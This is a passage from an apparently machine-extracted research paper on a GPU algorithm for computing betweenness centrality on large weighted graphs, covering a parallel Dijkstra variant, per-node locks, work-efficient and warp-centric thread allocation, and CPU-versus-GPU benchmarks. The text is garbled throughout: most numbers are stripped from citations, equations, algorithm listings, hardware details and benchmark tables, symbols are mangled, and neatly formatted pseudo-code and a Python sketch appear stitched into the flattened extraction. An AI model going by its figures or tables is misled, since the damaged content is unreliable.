proposed the warp-centric concept, in which a warp rather than a thread is allocated to each node. in the modern cuda framework, a warp consists of threads, which act as a single instruction multiple data (simd) unit. because a group of threads is assigned to a single frontier vertex, each thread processes a subset of the edges connected to that vertex. as a result, each thread does less work for high-degree nodes, thereby greatly reducing the waiting time. other techniques for addressing the load-imbalance problem include cooperative blocks, cta + warp + scan and load-balanced partitioning (davidson et al., ; wang et al., ). these methods attempt to assign threads to edges that need to be inspected by means of the design of several novel data structures and algorithms, which ensure excellent within-block and interblock load balance. however, these techniques require blocks to work cooperatively; i.e., each block must process several vertices or edges. our bc algorithm applies both coarse-grained and fine-grained approaches. for this reason, we apply the warp-centric technique in our algorithm to address the load-imbalance problem. parallel sssp algorithm to compute the bc on a weighted network, a parallel sssp algorithm is applied in the shortest-path step. the dijkstra algorithm, the traditional method of solving this problem, is inherently sequential because it selects a single frontier vertex in each iteration. the bellman–ford algorithm is easier to parallelize, but it suffers from rather low efficiency compared with the dijkstra algorithm. martin, torres & gavilanes ( ) fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed a parallel dijkstra algorithm, in which all vertices with the minimum tentative distance are inserted into the frontier set and the vertices in the frontier set are then processed simultaneously. ortega-arranz et al. ( ) implemented a more aggressive algorithm. they loosened the condition for selecting frontier nodes, resulting in more than one frontier node in each iteration, to achieve higher parallelism. d-stepping is another frequently employed parallel sssp algorithm, in which vertices are grouped into buckets and all vertices in a bucket are processed simultaneously. however, as described in davidson et al. ( ), there are three main characteristics that make �-stepping difficult to implement efficiently on a gpu; e.g., it requires dynamic arrays, which are poorly supported in the cuda framework. because of this, we base our sssp algorithm on the parallel dijkstra algorithm. however, previous sssp algorithms have focused only on the values of the shortest paths, neglecting the number of shortest paths, which is also necessary for the bc calculation. in this paper, we modify the parallel dijkstra algorithm presented in ortega-arranz et al. ( ) to combine it smoothly with our bc algorithm for weighted graphs. gpu-based algorithm our gpu-based bc algorithm for weighted graphs applies both coarse-grained (in which one block processes one root vertex s) and fine-grained (in which all threads in a block compute the shortest paths and dependencies related to s) parallel strategies. in a block, the shortest paths and dependencies corresponding to the root vertex processed by that block are calculated using brandes’s two-step framework. 
in the shortest-path step, we build a multi-level structure from root to leaves by relaxing the condition that a single frontier node is selected in each iteration and then calculating the distances and numbers of shortest paths for all selected frontier nodes simultaneously. in the dependency accumulation step, the multi-level structure built in the first step is re-employed to calculate the dependencies of the vertices from the leaves to the root of the multi-level structure. calculations for vertices at the same level are performed simultaneously. parallel bc algorithm in this section, we introduce the details of our gpu version of the bc algorithm for weighted graphs. first, we apply the compressed sparse row (csr) format, which is widely used in graph algorithms, to store the input graph (bell & garland, ; davidson et al., ). this format is space efficient because both a vertex and an edge consume one entry, and it is convenient for performing the traversal task on a gpu. moreover, edges related to the same vertex are stored consecutively in memory, which makes the warp-centric technique more efficient. for the storage of weighted graphs, an additional array is required to store the weights of all edges. we apply both coarse-grained and fine-grained parallel strategies. the pseudo-code presented in this paper describes the parallel procedure for threads within a block. algorithm shows the initialization of the required variables. u and f represent the unsettled set and the frontier set, respectively. v is unsettled if u[v] = and is a frontier fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ node if f[v] = . d represents the tentative distance, and s[v] is the number of shortest paths from s to v. d[v] stores the dependencies of v. lock stores locks for all nodes to avoid race conditions. if lock[v] = , changing neither s[v] nor d[v] is permitted (see the next section for details). vertices at the same level are consecutively recorded in s, and the start (or end) point of each level in s is stored in ends. in other words, s and ends record the levels of traversal in the csr format; they are used in the dependency accumulation step. as seen in algorithm , in the dependency accumulation step, we obtain all nodes at the same level from s and ends and accumulate the dependencies of these nodes simultaneously. note that in algorithm , we assign threads only to nodes that need to be inspected rather than to all nodes, which enhances the efficiency of the algorithm by avoiding redundant threads. we update the dependencies of edges in line of algorithm if edge betweenness is required. parallel dijkstra algorithm the parallel version of the bfs procedure that is applied in the bc algorithm for unweighted networks can be naturally adapted from the sequential version because vertices located on the same level in the bfs tree can be inspected simultaneously. moreover, in the dependency accumulation step (step two), dependencies are calculated from low-level vertices (nodes with the greatest depths in the tree) to high-level vertices (nodes that are close to the source node), and calculations for nodes at the same level are again performed simultaneously. in the weighted version, a multi-level structure is similarly necessary in the dependency accumulation step to achieve parallelization. as seen in fig. a, this structure should satisfy the condition ∀ u ∈ pv, lu < lv, where li denotes algorithm bc: variable initialization. 
algorithm 2 (bc: variable initialization):
  for v ∈ V do in parallel:
    u[v] ← 1; f[v] ← 0; d[v] ← ∞; σ[v] ← 0; δ[v] ← 0; lock[v] ← 0; ends[v] ← 0; s[v] ← 0
  d[s] ← 0; σ[s] ← 1; u[s] ← 0; f[s] ← 1
  s[0] ← s; s_len ← 1
  ends[0] ← 0; ends[1] ← 1; ends_len ← 2
  Δ ← 0

the level of node i in the multi-level structure, and $p_i$ represents the set of predecessors of vertex i. previous high-performance parallel sssp algorithms have calculated only the shortest-path values, neglecting the number of shortest paths and the level relationships. in this paper, we propose a variant of the parallel dijkstra algorithm that produces both the number of shortest paths and the multi-level structure needed in our betweenness algorithm. in the sequential dijkstra algorithm, the fact that one frontier node is selected in each iteration makes parallelization difficult. however, this restriction can be relaxed, so that several nodes are settled at once to form the frontier set and can then be inspected simultaneously in the next step. moreover, these settled nodes satisfy the level condition, so they form a new level that can be processed simultaneously in the dependency accumulation step. in this paper, we apply the method described in ortega-arranz et al. ( ). in this method, $\Delta_{node}(v) = \min\{w(v, u) : (v, u) \in E\}$ is precomputed. then, we define $\Delta_i$ as

$\Delta_i = \min\{d(u) + \Delta_{node}(u) : u \in U_i\}$ (2)

where d(u) is the tentative distance of node u and $U_i$ is the set of unsettled nodes in iteration i. all nodes that satisfy the condition

$d(v) \le \Delta_i$ (3)

are settled and become frontier nodes. when the dijkstra algorithm is applied in the bc calculation, the number of shortest paths must also be counted, and predecessor relationships between vertices at the same level are not permitted; otherwise, the parallel algorithm would produce incorrect dependencies. to this end, the above condition should be modified to

$d(v) < \Delta_i$ (4)

algorithm 3 (bc: dependency accumulation):
  depth ← ends_len - 1
  while depth > 0 do
    start ← ends[depth - 1]; end ← ends[depth] - 1
    for 0 ≤ i ≤ end - start do in parallel:
      w ← s[start + i]; δ_w ← 0
      for v ∈ neighbors(w) do
        if d[v] = d[w] + weight_wv then
          c ← σ[w] / σ[v] * (1 + δ[v])
          δ_w ← δ_w + c
          atomicAdd(edgebc[w], c)
      δ[w] ← δ_w
      if w ≠ s then atomicAdd(bc[w], δ[w])
    depth ← depth - 1

figure (b) illustrates an example in which vertex v is the source node. if eq. (3) were applied, v and v would become the frontier nodes after the inspection of v in the first iteration, and the number of shortest paths would be recorded for both v and v . then, v and v would be inspected simultaneously in the next step. if v were processed first, the number of shortest paths for v would be fixed before the contribution of the other frontier vertex had been added, so the stored count would be wrong. this mistake arises from the overambitious condition defined in eq. (3); v should not be settled after the first iteration. although the distances of all nodes would still be correct under eq. (3), the numbers of shortest paths would be wrong. by contrast, eq. (4) leads to the correct number of shortest paths for v because only v is settled after the first iteration. this condition appears in algorithm 4. by applying eq.
( ) in the sssp step, we achieve the correct numbers of shortest paths and construct a multi-level structure by setting each set of frontier nodes as a new level. algorithm presents our parallel dijkstra algorithm in detail. the tentative distance and number of shortest paths are calculated as shown in lines – . for a frontier vertex v, the thread inspects all edges connected to v. for an edge (v, w), if it finds a shorter path from v, i.e., d[v] + weightvw < d[w], d[w] will be updated, and s[w] will be set to zero since the previous number of shortest paths is invalid. then, if d[w] = d[v] + weightwv, the number of shortest paths for vertex w will be updated to s[w] + s[v] in accordance with the brandes algorithm. in this way, both the value and number of shortest paths are calculated and stored. in this part of the calculation, a race condition problem may arise because multiple nodes in the frontier set may connect to the same node, as seen in figure (a) an example of a multi-level structure. it is built in the sssp step and will later be used in the dependency accumulation step. nodes at the same level are inspected simultaneously in both steps. (b) an example of the selection of a set of frontier nodes in which using eq. ( ) will cause the number of shortest paths calculated for v to be incorrect. (c) an example of a race condition. v and v are both frontier nodes in the same iteration, and both are connected to w. full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fig. c. in this example, both v and v are in the frontier set and are connected to w, which results in the classical race condition problem. the reason this is a problem is that two or more threads may attempt to modify d[w] or s[w] simultaneously. to avoid this, we define a lock for each node. the first thread to focus on w will be granted the lock, and other threads will not be permitted to change d[w] and �[w]. we also adopt an atomic operation atomiccas and a variable needlock. for all threads, needlock is initially true (line ), and the threads will enter the following iteration. if a thread is granted the lock for w, it will run the shortest-path procedure and then release the lock (line ), and needlock = false will be assigned (line ) to exit the loop. if another thread owns algorithm bc: shortest-path calculation using the dijkstra algorithm. : while � < ∞ do : for v ∈ v and f[v] = do in parallel : for w ∈ neighbors(v) do : needlock ) true : while needlock do : if = atomiccas(lock[w], , ) then : if u[w] = and d[v] + weightvw < d[w] then : d[w] ) d[v] + weightvw : s [w] ) : if d[w] = d[v] + weightvw then : s[w] ) s[w] + s[v] : atomicexch(lock + w, ) : needlock ) false : � ) ∞ : for v ∈ v do in parallel : if u[v] = and d[v] < ∞ then : atomicmin(�,d[v] + �node v) : cnt ) : for v ∈ v do in parallel : f[v] ) : if u[v] = and d[v] < � then : u[v] ) : f[v] ) : t ) atomicadd(slen, ) : s[t] ) v : atomicadd(cnt, ) : if cnt > then : ends[endslen] ) ends[endslen - ] + cnt : endslen ) endslen + fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the lock, the thread will run the circulation but do nothing until the other thread releases the lock. in this way, all threads that need to inspect vertex w can perform the shortest- path task while avoiding race conditions. 
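The frontier-selection rule and the path counting can be simulated sequentially as below: Δ is the minimum of d(u) + Δ_node(u) over the unsettled vertices, and only vertices with d(v) strictly below Δ are settled, which is the point of Eq. (4). The sketch processes one frontier per loop iteration on the CPU and ignores locking entirely, so it is an illustration of the logic rather than the CUDA kernel.

```python
import math

def parallel_dijkstra_levels(adj, s):
    """adj: {u: [(v, w), ...]} with positive weights; returns (dist, sigma, levels),
    where levels[i] lists the vertices settled in round i (the S/ends structure)."""
    nodes = list(adj)
    delta_node = {u: min((w for _, w in adj[u]), default=math.inf) for u in nodes}
    dist = {u: math.inf for u in nodes}
    sigma = {u: 0 for u in nodes}
    unsettled = set(nodes)
    dist[s], sigma[s] = 0.0, 1
    unsettled.discard(s)
    frontier, levels = {s}, [[s]]
    while frontier:
        # relax all edges leaving the current frontier (done by many threads on the GPU)
        for v in frontier:
            for w, wt in adj[v]:
                nd = dist[v] + wt
                if w in unsettled and nd < dist[w]:
                    dist[w], sigma[w] = nd, 0        # shorter path found: reset the count
                if dist[w] == nd:
                    sigma[w] += sigma[v]             # equal-length path: add its count
        # Delta = min over unsettled u of d(u) + Delta_node(u)
        candidates = [dist[u] + delta_node[u] for u in unsettled if dist[u] < math.inf]
        if not candidates:
            break
        big_delta = min(candidates)
        # settle only vertices with d(v) strictly below Delta, per Eq. (4); a "<=" rule
        # could settle a vertex and one of its shortest-path predecessors together and
        # freeze sigma too early.
        new_frontier = {u for u in unsettled if dist[u] < big_delta}
        unsettled -= new_frontier
        frontier = new_frontier
        if new_frontier:
            levels.append(sorted(new_frontier))
    return dist, sigma, levels

adj = {
    "s": [("a", 1.0), ("b", 2.0)],
    "a": [("s", 1.0), ("b", 1.0)],
    "b": [("s", 2.0), ("a", 1.0), ("c", 1.0)],
    "c": [("b", 1.0)],
}
print(parallel_dijkstra_levels(adj, "s"))
```

On this toy graph the routine reports two shortest paths from s to b and to c, which is exactly the count that a looser settling rule can get wrong.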
the lock cannot be replaced with an atomic operation because in the shortest-path procedure, multiple instructions related to w (from lines to ) are executed, rather than only one, and they cannot be interrupted by other threads that may modify d[w] and s[w]. after d and s have been computed for all nodes, we can obtain di based on the computed results, as seen on lines – . finally, u, f, s and ends are updated for the next iteration. work-efficient method as seen on line in algorithm , threads will be assigned to all nodes, but calculations will be performed only for nodes in the frontier set, which may be inefficient. mclaughlin & bader ( , ) developed an excellent work-efficient technique for solving this problem. in this paper, we develop a work-efficient version of our algorithm by adopting algorithm work-efficient bc: variable initialization. : for v ∈ v do in parallel : // initialize all variables except f : f[ ] ) s : flen = : // initialize other variables algorithm work-efficient bc: shortest-path calculation using the dijkstra algorithm. : while � < ∞ do : for � i < flen do in parallel : v ) f[i] : // inspect v : // calculate � : flen ) : for v ∈ v do in parallel : if u[v] = and d[v] < � then : u[v] ) : t ) atomicadd(flen, ) : f[t] ) v : if flen > then : ends[end slen] ) end s[end slen - ] + flen : end slen ) end slen + : for � i < flen do in parallel : s[slen + i] ) f[i] : slen ) slen + flen fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this idea. f is replaced with a queue that stores all frontier nodes, and a variable flen is defined to recode the length of f, as seen in algorithm . then, at line in algorithm , threads can be assigned to f[ ] ∼ f[flen - ], which may be much smaller than the total number of nodes. at the same time, the method used to update f should also be modified as shown in algorithm . warp-centric method many real-world networks are scale-free in nature, which means that their degree distributions follow a power law. when parallel graph algorithms are implemented using the node-parallel strategy, this feature gives rise to a severe load-imbalance problem. most nodes have low degrees, while some nodes have extremely high degrees. threads that are assigned to high-degree nodes will run slowly, and other threads will have to wait. the edge-parallel strategy can be used to solve this problem (jia et al., ), but it simultaneously introduces other problems of underutilization. in this paper, we apply the novel warp-centric method (hong et al., ), in which a warp rather than a thread is allocated to a single node. then, each thread within a warp focuses on a subset of the edges connected to the corresponding node. as a result, each thread does less work for nodes with high degrees, and the wait time will be greatly decreased. moreover, memory access patterns can be more tightly grouped compared with conventional thread-level task allocation, and consequently, the efficiency of memory access can also be fundamentally improved. nevertheless, the warp-centric method also has some disadvantages. first, the degree of a node may be smaller than the warp size, which is always in modern gpus. to solve this problem, hong et al. ( ) proposed virtual warps. second, the number of required threads will be increased overall because each node needs warp_size threads figure examples of thread allocation using (a) the node-parallel method and (b) the work- efficient method. 
red nodes and white nodes are frontier and non-frontier nodes, respectively, and each arrow represents a warp, which contains multiple threads that are all assigned to the same node. in the warp-centric method, more threads will be wasted on non-frontier nodes that do not need to be inspected. however, this problem can be solved by combining the warp-centric and work-efficient methods, as shown in (b). full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rather than one thread in this approach (here, warp_size denotes the number of threads in each warp). however, the number of threads per block is fixed; hence, each thread will be iteratively assigned to additional nodes, which may result in low performance. we find that the work-efficient technique can effectively relieve this problem because it requires fewer threads compared with the conventional node-parallel method, as seen in fig. . in this paper, we apply the warp-centric method in combination with both the node-parallel and work-efficient methods, resulting in four algorithms with different thread allocation strategies, and we compare these algorithms on both real-world and synthetic networks. experiments networks and settings we collected ten weighted real-world networks from the internet. these networks are of a broad variety of types, including collaboration networks, biological networks and social networks. we also downloaded a large synthetic network with vertices and more than million edges. these networks are publicly available on the internet and have been analyzed extensively in previous studies (rossi & ahmed, ; bansal et al., ; palla et al., ; barabási & albert, ; leskovec & krevl, ; de domenico et al., ; leskovec, adamic & huberman, ; bader et al., , ). the details of these networks are listed in table . we developed a parallel cpu algorithm based on graph-tool (https://graph-tool.skewed.de), which is an efficient network analysis tool whose core data and algorithms are implemented in c++, making it efficient for various graph-related algorithms, including betweenness calculations (https://graph-tool.skewed.de/performance). the bc calculation performed by this tool relies on the boost graph library (siek, lee & lumsdaine, ), and it supports the execution of parallel betweenness algorithms on weighted networks (gregor & lumsdaine, ) (http://www.boost.org/doc/libs/ _ _ /libs/ graph_parallel/doc/html/index.html). we ran our four gpu implementations on a geforce gtx using the cuda . toolkit. the geforce gtx is a compute-capable . gpu designed using the pascal architecture that has multiprocessors, gb of device memory, and a clock frequency of , mhz. the cpu we used is an intel core i - k processor. the core i - k has a frequency of . ghz, an mb cache and eight physical processor cores. we used four threads since hyperthreading does not improve performance, and we also ran a sequential version because such implementations are still widely applied by network researchers. to further investigate the effects of network structures on the algorithms’ performance, we generated two types of networks: erdös–rényi (er) random graphs (erdös & rényi, ) and kronecker graphs (leskovec et al., ). the degree distribution of an er random graph is a poisson distribution, meaning that its node degrees are relatively balanced. 
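As an illustration of the synthetic inputs used in this comparison, the sketch below builds a weighted Erdős–Rényi graph with networkx and computes a CPU reference betweenness on it. The node count, average degree, and weight range are placeholders, the paper's actual CPU baseline is graph-tool rather than networkx, and the Kronecker generator is not reproduced here.

```python
import random
import networkx as nx

def weighted_er_graph(n, avg_degree, w_lo=1, w_hi=10, seed=0):
    """Erdos-Renyi graph with n nodes, expected degree avg_degree, and uniformly
    random integer edge weights in [w_lo, w_hi] (assumed range)."""
    p = avg_degree / (n - 1)
    g = nx.gnp_random_graph(n, p, seed=seed)
    rng = random.Random(seed)
    for u, v in g.edges():
        g[u][v]["weight"] = rng.randint(w_lo, w_hi)
    return g

g = weighted_er_graph(n=1000, avg_degree=8)
# small-instance CPU reference, useful for checking a GPU implementation's output
bc = nx.betweenness_centrality(g, weight="weight", normalized=False)
print(max(bc.values()))
```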
meanwhile, a kronecker graph possesses scale-free and small-world characteristics, making it appropriate for studying the load-imbalance problem. we uniformly assigned random edge weights ranging from to , as done in previous studies (martin, torres & gavilanes, ; ortega-arranz et al., ). we used these synthetic networks to study the relationship between the graph structure and the traversal strategy. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://graph-tool.skewed.de https://graph-tool.skewed.de/performance http://www.boost.org/doc/libs/ _ _ /libs/graph_parallel/doc/html/index.html http://www.boost.org/doc/libs/ _ _ /libs/graph_parallel/doc/html/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results overall performance from table , we can see that all of the gpu programs achieve better performance than both the sequential and parallel cpu versions on the real-world networks. the best gpu algorithm for each network achieves speedups of . � to . � compared with the parallel cpu method and of � to � compared with the sequential cpu algorithm, and the performance can be markedly improved by assigning an appropriate warp_size. even on the two large networks with more than one million vertices, our algorithm can produce results within or days. note that the performance of previous gpu-based bc algorithms for unweighted networks might be superior to ours on networks of similar sizes because the complexity of the weighted bc algorithm is higher than that of its unweighted counterparts. as seen from table , the work-efficient method is more efficient than the node-parallel method on all networks, whereas the warp-centric method performs better on high-degree networks, such as the three biological networks. however, combining the warp-centric method and the work-efficient method always results in superior or approximately equal performance compared with the work-efficient method alone because it causes fewer threads to be required in each step, which, in turn, alleviates the second disadvantage of the warp-centric method. for networks with low average degrees, such as ca-mathscinet-dir, rt-higgs and mt-higgs, applying the warp-centric method with the real warp_size ( ) is always inefficient because the nodes’ degrees are always smaller than warp_size. using a smaller virtual warp_size enables better performance on table details of networks from public datasets. network vertices edges max degree average degree description bio-human-gene (rossi & ahmed, ; bansal et al., ) , , , , , . human gene regulatory network bio-human-gene (rossi & ahmed, ; bansal et al., ) , , , , , . human gene regulatory network bio-mouse-gene (rossi & ahmed, ; bansal et al., ) , , , , . mouse gene regulatory network ca-mathscinet-dir (rossi & ahmed, ; palla et al., ) , , . co-authorship network actors (barabási & albert, ) , , , , . actor collaboration network rt-higgs (leskovec & krevl, ; de domenico et al., ) , , , . twitter retweeting network mt-higgs (leskovec & krevl, ; de domenico et al., ) , , , . twitter mention network rec-amazon (rossi & ahmed, ; leskovec, adamic & huberman, ) , , . product copurchase network sc-shipsec (rossi & ahmed, ; bader et al., ) , , , . scientific computing network soc-pokec (leskovec & krevl, ) , , , , , . pokec social network kron_g (bader et al., ) , , , , , . large kronecker network fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ these networks, as shown in table , and we will also further demonstrate this later. with an appropriate adjustment of warp_size for low-degree networks, the best- performing program achieves average speedups of . � compared with the parallel cpu implementation and . � compared with the baseline node-parallel strategy. for the rec-amazon graph, which has the lowest maximum degree, the load-imbalance problem does not exist, and for this reason, the warp-centric method cannot improve the performance; instead, the algorithm in which the work-efficient strategy alone is applied performs the best. influence of network structure to deeply investigate the relationship between network structure and performance for the four gpu implementations, we further ran these algorithms on two types of synthetic graphs, with the results shown in fig. . from figs. a to d, we find that the work-efficient algorithm performs better than the node-parallel algorithm on all networks since it always reduces the required number of threads. as seen in figs. a and b, table benchmark results of various bc algorithms on weighted graphs, including a sequential cpu algorithm, a four-thread cpu algorithm, and node-parallel (np), work-efficient (we) and warp-centric (warpx denotes that the warp_size is x) algorithms. algorithm bio-human-gene bio-human-gene bio-mouse-gene ca-mathscinet-dir actors cpu (sequential) , . , . , . , . – cpu ( threads) , . , . , . , . , . np , . . , . , . , . we , . . , . , . , . np+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . best speedup (over sequential cpu) . � . � . � . � – best speedup (over parallel cpu) . � . � . � . � . � algorithm rt-higgs mt-higgs rec-amazon sc-shipsec soc-pokec kron_g cpu (sequential) , . , . , . , . – – cpu ( threads) , . . . , . – – np , . . . . – – we , . . . . – , . ( . h) np+warp , . . , . , . – , . ( . h) we+warp , . . . . , . ( h) – we+warp , . . . . – – we+warp , . . . . – – we+warp , . . . . – – best speedup (over sequential cpu) . � . � . � . � – – best speedup (over parallel cpu) . � . � . � . � – – notes: the times are expressed in seconds. the last two rows report speedups. the result of the cpu sequential algorithm on the actors network cannot be provided because this program consumed too much time on this network. for the same reason, we also ran only selected gpu algorithms on the two very large networks. bold entries display running times of the fastest algorithms for specific networks. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the warp-centric method works well on networks of high degrees, which is consistent with the findings for the real-world networks. note that for kronecker graphs, the warp-centric method works better than it does for random graphs since kronecker graphs have a severe load-imbalance problem, which the warp-centric technique can appropriately address. by contrast, for er random graphs, as shown in fig. a, the only advantage of the warp-centric method is its efficient memory access. for low-degree graphs, the warp-centric method results in even worse performance than the node-parallel strategy, as can be seen in figs. c and d, because the degrees are always smaller than warp_size. 
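The degree/warp-size trade-off discussed here can be made concrete with a back-of-envelope utilisation estimate: give each frontier vertex one (possibly virtual) warp, let the warp's threads split that vertex's edges, and count how many thread-slots do no edge work and how many edges the busiest thread must process. The degree sequences below are invented examples, not measurements from the paper's networks.

```python
import math

def idle_fraction(degrees, warp_size):
    """Fraction of thread-slots doing no edge work when each frontier vertex gets
    warp_size threads and those threads split the vertex's edges."""
    slots = sum(warp_size * math.ceil(max(d, 1) / warp_size) for d in degrees)
    return 1.0 - sum(degrees) / slots

def busiest_thread_edges(degrees, warp_size):
    """Edges handled by the most loaded thread (a proxy for the waiting time caused
    by load imbalance); warp_size=1 corresponds to the plain node-parallel case."""
    return max(math.ceil(d / warp_size) for d in degrees)

low_degree_frontier = [3, 4, 2, 5, 3, 4]     # e.g. a frontier in a low-degree network
skewed_frontier = [2, 3, 2, 500, 4, 3]       # e.g. a scale-free frontier with one hub
for ws in (1, 4, 8, 32):
    print(f"warp_size={ws:2d}  "
          f"idle(low)={idle_fraction(low_degree_frontier, ws):.2f}  "
          f"idle(skewed)={idle_fraction(skewed_frontier, ws):.2f}  "
          f"busiest(skewed)={busiest_thread_edges(skewed_frontier, ws)}")
```

Smaller virtual warps keep utilisation high when degrees are small, while larger warps cap the work of the busiest thread on skewed frontiers, which is why the best setting depends on the network structure, as the experiments above indicate.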
for random graphs, the performance of the warp-centric method is scale : log (number of nodes) tim e (s ) a scale : log (number of nodes) tim e (s ) b average degree tim e (s ) c average degree tim e (s ) d node−parallel work−efficient warp−centric work−efficient+warp−centric average degree a ve ra g e d e p th kronecker random e figure performance of the four implementations on er random and kronecker graphs. here, warp_size is fixed to in the two warp-centric methods. (a) and (b) show the results of varying the number of nodes from to for er random and kronecker graphs, respectively, with a fixed average degree of for both types of networks. (c) and (d) show the results of varying the average degree for random and kronecker networks, respectively, where the random networks contain , vertices and the kronecker networks contain nodes. (e) illustrates the average depths of the search trees used for the random graphs in (c) and the kronecker graphs in (d). networks with greater depths have smaller average frontier sets, resulting in poor parallel performance. full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extremely poor when the average degree is smaller than , and fig. e illustrates the reason. the low average degree results in a large average depth, which means that the average size of the frontier sets is small. in this case, the warp-centric method assigns more useless threads to nodes that do not need inspection. however, as the degree grows and approaches warp_size, the depth simultaneously drops sharply, which makes the warp-centric method perform much better. meanwhile, low-degree kronecker graphs have power-law degree distributions and small average depths; consequently, the warp-centric method does not perform as poorly as on random graphs. however, the combination of these two methods always results in faster performance than the work- efficient method alone because it avoids the second disadvantage of the warp-centric method, as discussed in the previous section. in conclusion, the work-efficient method always achieves better performance, whereas the performance of the warp-centric method depends on the network structure; however, an algorithm that combines the two always achieves the best performance. analysis of warp size as seen from the above analysis, using a smaller warp_size may accelerate both the node-parallel and work-efficient implementations combined with the warp-centric method when the average degree of the network is small. this hypothesis is verified in table . we applied smaller warp_size values on the rt-higgs network, the mt-higgs network and two synthetic graphs with an average degree of four. we find that implementations with smaller warp_size values perform better than either the baseline node-parallel algorithm or the algorithm with the largest warp_size on both of the low-degree real-world networks, rt-higgs and mt-higgs. moreover, when coupled with the work-efficient method, algorithms with smaller warp_size values also perform better than either the work-efficient strategy alone or the combination of the work-efficient strategy and the largest warp_size. the reason is that a small warp_size reduces the required number of threads, thereby eliminating the waste incurred when the number table the results of using different values of warp_size on several low-degree networks. 
network rt-higgs mt-higgs er kronecker node-parallel . . . . warp . . . . warp . . . . warp . . . . warp . . . . we . . . . we+warp . . . . we+warp . . . . we+warp . . . . we+warp . . . . notes: we is short for work-efficient algorithm. both the er network and the kronecker network have nodes, and the average node degree of each is four. the times are expressed in seconds. for these low-degree networks, implementations with smaller warp_size values achieve better performance. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of threads assigned to a node is greater than its degree. the implementations with small warp_size values coupled with the work-efficient method achieve the best performance because they avoid both disadvantages of the warp-centric method while utilizing its advantages. the results obtained on the low-degree kronecker graph are similar to those obtained on realistic networks for the same reason. for er random graphs, algorithms with smaller warp_size values do not achieve better performance compared with the node-parallel version because of the large average tree depth, as discussed in the previous section. however, when the work-efficient method is applied, implementations with smaller warp_size values perform slightly better than the work-efficient algorithm alone, thereby further demonstrating the excellent performance and stability of the joint algorithm. in summary, the joint algorithm is the most efficient and the most insensitive to the network structure. moreover, if we choose an appropriate warp_size for the graph of interest, the performance of the joint algorithm can be even further improved (see tables and ). conclusion existing gpu versions of bc algorithms have concentrated only on unweighted networks for simplicity. our work offers an algorithm for computing bc in large weighted networks, bridging this gap and enabling a marked efficiency enhancement compared with cpu implementations. moreover, we incorporate two excellent techniques into our algorithm: the work-efficient and warp-centric methods. the work-efficient method allocates threads more efficiently, and the warp-centric method solves the load-imbalance problem while simultaneously optimizing memory access. we have compared these implementations with sequential and parallel cpu algorithms on realistic networks. the results show that the gpu parallel algorithms perform much better than the cpu algorithms and that the algorithm that combines both the work-efficient and warp-centric techniques is the best, achieving . � to . � speedups over the parallel cpu version and � to � speedups over the sequential cpu version. results obtained on synthetic random graphs and kronecker graphs further demonstrate the superior performance of our solution. in our future work, we will consider other techniques for addressing the load- imbalance problem to further improve the performance of our algorithm (davidson et al., ; wang et al., ). in addition, solomonik et al. ( ) have proposed a parallel bc algorithm for weighted graphs based on novel sparse matrix multiplication routines that has achieved impressive performance, which may provide further inspiration for accelerating our algorithm. we may also consider implementing a gpu algorithm for processing dynamic networks. 
when networks change only slightly (e.g., a few new nodes are added or a few links vanish), recalculating the bc for all nodes is unnecessary because the bc of most nodes and edges will not change. several previous works have explored sequential algorithms for addressing this issue (lee, choi & chung, ; singh et al., ; nasre, pontecorvi & ramachandran, ). we plan to develop a gpu version of these algorithms to achieve better performance. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by nsfc (grant no. ) and the fund of the state key laboratory of software development environment (grant nos. sklsde- zx- and sklsde- zx- ). rui fan is supported by the innovation foundation of buaa for phd graduates. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsfc: . state key laboratory of software development environment: sklsde- zx- and sklsde- zx- . innovation foundation of buaa for phd graduates. competing interests the authors declare that they have no competing interests. author contributions � rui fan conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. � ke xu conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � jichang zhao conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: zhao, jichang ( ): a gpu-based solution to fast calculation of betweenness centrality on large weighted networks. figshare. https://doi.org/ . /m .figshare. .v references abedi m, gheisari y. . nodes with high centrality in protein interaction networks are responsible for driving signaling pathways in diabetic nephropathy. peerj :e doi . /peerj. . bader da, meyerhenke h, sanders p, schulz c, kappes a, wagner d. . benchmarking for graph clustering and partitioning. new york: springer, – . bader da, meyerhenke h, sanders p, wagner d, eds. . graph partitioning and graph clustering. in: th dimacs implementation challenge workshop, atlanta, ga, georgia. bansal m, belcastro v, ambesi-impiombato a, di bernardo d. . how to infer gene networks from expression profiles. molecular systems biology : doi . /msb . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v 